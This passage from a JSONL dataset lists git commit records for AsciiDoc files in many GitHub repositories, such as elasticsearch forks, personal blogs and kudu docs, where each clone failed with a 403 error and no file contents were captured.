\/elasticsearch,episerver\/elasticsearch,lmtwga\/elasticsearch,fekaputra\/elasticsearch,mohit\/elasticsearch,clintongormley\/elasticsearch,overcome\/elasticsearch,adrianbk\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,infusionsoft\/elasticsearc
h,smflorentino\/elasticsearch,i-am-Nathan\/elasticsearch,karthikjaps\/elasticsearch,YosuaMichael\/elasticsearch,ImpressTV\/elasticsearch,ImpressTV\/elasticsearch,huypx1292\/elasticsearch,mbrukman\/elasticsearch,yongminxia\/elasticsearch,18098924759\/elasticsearch,luiseduardohdbackup\/elasticsearch,alexbrasetvik\/elasticsearch,JervyShi\/elasticsearch,kalimatas\/elasticsearch,tsohil\/elasticsearch,cnfire\/elasticsearch-1,MisterAndersen\/elasticsearch,kingaj\/elasticsearch,Widen\/elasticsearch,loconsolutions\/elasticsearch,nellicus\/elasticsearch,JervyShi\/elasticsearch,Brijeshrpatel9\/elasticsearch,knight1128\/elasticsearch,aglne\/elasticsearch,dylan8902\/elasticsearch,lydonchandra\/elasticsearch,martinstuga\/elasticsearch,Stacey-Gammon\/elasticsearch,thecocce\/elasticsearch,fforbeck\/elasticsearch,YosuaMichael\/elasticsearch,lchennup\/elasticsearch,rajanm\/elasticsearch,karthikjaps\/elasticsearch,wimvds\/elasticsearch,skearns64\/elasticsearch,Liziyao\/elasticsearch,hafkensite\/elasticsearch,iacdingping\/elasticsearch,luiseduardohdbackup\/elasticsearch,Liziyao\/elasticsearch,Fsero\/elasticsearch,smflorentino\/elasticsearch,Collaborne\/elasticsearch,Chhunlong\/elasticsearch,drewr\/elasticsearch,davidvgalbraith\/elasticsearch,overcome\/elasticsearch,lydonchandra\/elasticsearch,infusionsoft\/elasticsearch,Uiho\/elasticsearch,zhiqinghuang\/elasticsearch,thecocce\/elasticsearch,pablocastro\/elasticsearch,kalburgimanjunath\/elasticsearch,jbertouch\/elasticsearch,queirozfcom\/elasticsearch,kalimatas\/elasticsearch,humandb\/elasticsearch,zhiqinghuang\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nellicus\/elasticsearch,vingupta3\/elasticsearch,mmaracic\/elasticsearch,abibell\/elasticsearch,awislowski\/elasticsearch,kimimj\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,YosuaMichael\/elasticsearch,javachengwc\/elasticsearch,zhiqinghuang\/elasticsearch,strapdata\/elassandra,hirdesh2008\/elasticsearch,andrejserafim\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,KimTaehee\/elasticsearch,mm0\/elasticsearch,iamjakob\/elasticsearch,ckclark\/elasticsearch,jsgao0\/elasticsearch,AndreKR\/elasticsearch,koxa29\/elasticsearch,sdauletau\/elasticsearch,kimimj\/elasticsearch,wenpos\/elasticsearch,kunallimaye\/elasticsearch,kingaj\/elasticsearch,mjhennig\/elasticsearch,vroyer\/elasticassandra,tkssharma\/elasticsearch,bawse\/elasticsearch,schonfeld\/elasticsearch,linglaiyao1314\/elasticsearch,umeshdangat\/elasticsearch,MichaelLiZhou\/elasticsearch,snikch\/elasticsearch,jbertouch\/elasticsearch,episerver\/elasticsearch,markharwood\/elasticsearch,xpandan\/elasticsearch,kalimatas\/elasticsearch,C-Bish\/elasticsearch,himanshuag\/elasticsearch,drewr\/elasticsearch,ricardocerq\/elasticsearch,winstonewert\/elasticsearch,nrkkalyan\/elasticsearch,aglne\/elasticsearch,andrestc\/elasticsearch,lzo\/elasticsearch-1,truemped\/elasticsearch,kaneshin\/elasticsearch,nezirus\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,GlenRSmith\/elasticsearch,djschny\/elasticsearch,wbowling\/elasticsearch,artnowo\/elasticsearch,szroland\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,wayeast\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Chhunlong\/elasticsearch,chirilo\/elasticsearch,hechunwen\/elasticsearch,Rygbee\/elasticsearch,s1monw\/elasticsearch,Shekharrajak\/elasticsearch,beiske\/elasticsearch,amaliujia\/elasticsearch,karthikjaps\/elasticsearch,acchen97\/elasticsearch,wimvds\/elasticsearch,hanswang\/elasticsearch,nrkkalyan\/elasticsearch,loconsolutions\/elasticsearch,xingguang2013\/elasticse
arch,adrianbk\/elasticsearch,markharwood\/elasticsearch,achow\/elasticsearch,HarishAtGitHub\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,wittyameta\/elasticsearch,xuzha\/elasticsearch,zeroctu\/elasticsearch,areek\/elasticsearch,jimhooker2002\/elasticsearch,mgalushka\/elasticsearch,MetSystem\/elasticsearch,geidies\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,HarishAtGitHub\/elasticsearch,hydro2k\/elasticsearch,kingaj\/elasticsearch,jeteve\/elasticsearch,achow\/elasticsearch,markllama\/elasticsearch,mm0\/elasticsearch,Fsero\/elasticsearch,sc0ttkclark\/elasticsearch,djschny\/elasticsearch,Siddartha07\/elasticsearch,tahaemin\/elasticsearch,karthikjaps\/elasticsearch,apepper\/elasticsearch,ImpressTV\/elasticsearch,beiske\/elasticsearch,mmaracic\/elasticsearch,strapdata\/elassandra5-rc,sposam\/elasticsearch,rento19962\/elasticsearch,apepper\/elasticsearch,kenshin233\/elasticsearch,F0lha\/elasticsearch,loconsolutions\/elasticsearch,strapdata\/elassandra-test,kubum\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,drewr\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,andrestc\/elasticsearch,hafkensite\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,schonfeld\/elasticsearch,Rygbee\/elasticsearch,nazarewk\/elasticsearch,NBSW\/elasticsearch,mnylen\/elasticsearch,Kakakakakku\/elasticsearch,Chhunlong\/elasticsearch,iantruslove\/elasticsearch,knight1128\/elasticsearch,fooljohnny\/elasticsearch,obourgain\/elasticsearch,zhiqinghuang\/elasticsearch,wimvds\/elasticsearch,markllama\/elasticsearch,strapdata\/elassandra-test,maddin2016\/elasticsearch,fforbeck\/elasticsearch,dataduke\/elasticsearch,yynil\/elasticsearch,nomoa\/elasticsearch,ESamir\/elasticsearch,NBSW\/elasticsearch","old_file":"docs\/reference\/mapping\/date-format.asciidoc","new_file":"docs\/reference\/mapping\/date-format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0485a343ba4dc1ec324ef9ee8780bef8442e9839","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e61d8dc0befea48a210a272dcd2b753abad3db5","subject":"db docs","message":"db docs\n","repos":"JPMoresmau\/sqlg,JPMoresmau\/sqlg,pietermartin\/sqlg,pietermartin\/sqlg,JPMoresmau\/sqlg,pietermartin\/sqlg,pietermartin\/sqlg","old_file":"sqlg-mariadb-parent\/mariadb.install.adoc","new_file":"sqlg-mariadb-parent\/mariadb.install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pietermartin\/sqlg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d994dd5d8d8b4ac2683c7c32f704aa52409bd3df","subject":"Update 2016-10-28-innovation-Engineer-Blog-Authors.adoc","message":"Update 
2016-10-28-innovation-Engineer-Blog-Authors.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8473e09f9359b3c5a67682ccf47d22524422cc1","subject":"Update 2016-04-25-draft-2.adoc","message":"Update 2016-04-25-draft-2.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-25-draft-2.adoc","new_file":"_posts\/2016-04-25-draft-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff92916073edcba52b37b1452d398bca4144ecfc","subject":"Update 2015-02-18-Commits-safety-first.adoc","message":"Update 2015-02-18-Commits-safety-first.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Commits-safety-first.adoc","new_file":"_posts\/2015-02-18-Commits-safety-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17f00410b31cb286d4e0ac99f82348007e8923a3","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ecc6ae74b378c7471e6e7fe7825df27386452a9","subject":"Update 2014-08-28-Ask-lead-dev-first.adoc","message":"Update 2014-08-28-Ask-lead-dev-first.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-08-28-Ask-lead-dev-first.adoc","new_file":"_posts\/2014-08-28-Ask-lead-dev-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f08a7deddc73969b9fe3d2eaf19e8f32c5937a1b","subject":"Update 2015-06-29-restart-sudosannet.adoc","message":"Update 2015-06-29-restart-sudosannet.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-06-29-restart-sudosannet.adoc","new_file":"_posts\/2015-06-29-restart-sudosannet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"63109455f3e4853b7bc8df93ae5579c2cd562582","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a343ef457fcd428984ea150cf99e42c8edb0b8fa","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9baed31034f33b1bb3a8ebe00de522af5eea957","subject":"Update 2015-02-17-Out-with-the-old-in-with-the.adoc","message":"Update 2015-02-17-Out-with-the-old-in-with-the.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-17-Out-with-the-old-in-with-the.adoc","new_file":"_posts\/2015-02-17-Out-with-the-old-in-with-the.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3315fa76d815836dc82c20395c73bbaad9626172","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7fb218f6edfdc32e56da3ddc53edf95b26c732a","subject":"fixed tutorial on startup order: I fixed the app source code in other repo to avoid the issue.","message":"fixed tutorial on startup order: I fixed the app source code in other repo to avoid the issue.\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0afb5fecbb5692d0e37c78815b99f43e0727b70","subject":"Update 2016-10-19-algo-1074.adoc","message":"Update 
2016-10-19-algo-1074.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-1074.adoc","new_file":"_posts\/2016-10-19-algo-1074.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60eca0125c9383fa67b304b15b64728b8f153ceb","subject":"docs: improvements to NTP troubleshooting","message":"docs: improvements to NTP troubleshooting\n\nChange-Id: I07b6871b91ed4ee08992d2fcd093f1054c7d61b8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9234\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83cfff71027495a560281fd13bee67259def1708","subject":"y2b create post World's Most Powerful Gaming Tablet? -- Razer Edge Pro Unboxing \\u0026 Overview","message":"y2b create post World's Most Powerful Gaming Tablet? 
-- Razer Edge Pro Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-10-Worlds-Most-Powerful-Gaming-Tablet--Razer-Edge-Pro-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-10-Worlds-Most-Powerful-Gaming-Tablet--Razer-Edge-Pro-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84c991f9647a0255bc8fcef535663f039288446","subject":"Update 2015-09-24-Fuck-you-Im-great.adoc","message":"Update 2015-09-24-Fuck-you-Im-great.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-09-24-Fuck-you-Im-great.adoc","new_file":"_posts\/2015-09-24-Fuck-you-Im-great.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a773e781ff1d321c036b55ff2a753de11883afa1","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"766c35bb76a10688cba01d2975af44bd2e84df5e","subject":"Update 2015-03-08-Les-Finlandais.adoc","message":"Update 2015-03-08-Les-Finlandais.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-08-Les-Finlandais.adoc","new_file":"_posts\/2015-03-08-Les-Finlandais.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2690972f8d98ec0c4ddddd52c3c7ee5bd8ae8f0d","subject":"Deleted 20161110-1232-showoff-zone-owo.adoc","message":"Deleted 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a64064b0de955b69a609d76b5b370730601d02e","subject":"Update 2017-07-25-The-beginning.adoc","message":"Update 
2017-07-25-The-beginning.adoc","repos":"raditv\/raditv.github.io,raditv\/raditv.github.io,raditv\/raditv.github.io,raditv\/raditv.github.io","old_file":"_posts\/2017-07-25-The-beginning.adoc","new_file":"_posts\/2017-07-25-The-beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raditv\/raditv.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"473e63f5731e2f06a82e64aa594d326d21a5d356","subject":"y2b create post Doritos Locos Taco Unboxing (Taco Bell Big Box)","message":"y2b create post Doritos Locos Taco Unboxing (Taco Bell Big Box)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-20-Doritos-Locos-Taco-Unboxing-Taco-Bell-Big-Box.adoc","new_file":"_posts\/2013-02-20-Doritos-Locos-Taco-Unboxing-Taco-Bell-Big-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abac78e44713ea24795c512c00d347e5fad85794","subject":"Update 2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","message":"Update 2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","new_file":"_posts\/2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bfbdbe948241bd82c5297ad9ed95c14b040ac01","subject":"Update 2015-08-31-Welcome-on-board.adoc","message":"Update 2015-08-31-Welcome-on-board.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-08-31-Welcome-on-board.adoc","new_file":"_posts\/2015-08-31-Welcome-on-board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9760629083c8f8274adffe7cadf8b45002c4ea2b","subject":"y2b create post Galaxy Note 3 Bend Test (iPhone 6 Plus Follow-up)","message":"y2b create post Galaxy Note 3 Bend Test (iPhone 6 Plus Follow-up)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-23-Galaxy-Note-3-Bend-Test-iPhone-6-Plus-Followup.adoc","new_file":"_posts\/2014-09-23-Galaxy-Note-3-Bend-Test-iPhone-6-Plus-Followup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe21003341c8fb56ea92abd618c2bc1f3bc0b5d0","subject":"[DOCS] Mute failing test snippet","message":"[DOCS] Mute failing test snippet\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@0a2a90bbed2f5a6b1aec7be31b780ab4f29a7a5a\n","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/put-datafeed.asciidoc","new_file":"docs\/en\/rest-api\/ml\/put-datafeed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb64ffda7c39e88375d6f4ddf9ead34f5752ba1","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8007a80cd98b9ed3fe4c08f6b5e737a57742b14","subject":"[DROOLS-2740] Added release note info (#940)","message":"[DROOLS-2740] Added release note info (#940)\n\n* Added release note info about DROOLS-2740 impact\r\n\r\n* Small refactoring\r\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/ReleaseNotes\/ReleaseNotesWorkbench.7.9.0.Final-section.adoc","new_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/ReleaseNotes\/ReleaseNotesWorkbench.7.9.0.Final-section.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e1ea87601ab9218dacacf9ffe913799999eca3a","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 
2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cde5c01a93dc3f0dd0e41be554ecbd3f8d40fd5e","subject":"Update 2017-02-14-Smarter-Things-Hub.adoc","message":"Update 2017-02-14-Smarter-Things-Hub.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Smarter-Things-Hub.adoc","new_file":"_posts\/2017-02-14-Smarter-Things-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6472c79a61fe0b4eef59354e9c3e1ccbe150fe","subject":"Added robotics section","message":"Added robotics section\n","repos":"andrewazores\/homepage","old_file":"robotics.adoc","new_file":"robotics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"04401255bade1e1b6f1b79caba856d92e6690527","subject":"initial proposal to enable discussions","message":"initial proposal to enable discussions\n\nApply suggestions from code review\n\nCo-authored-by: George Gastaldi <gegastaldi@gmail.com>\nCo-authored-by: Guillaume Smet <guillaume.smet@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: Clement Escoffier <clement.escoffier@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: George 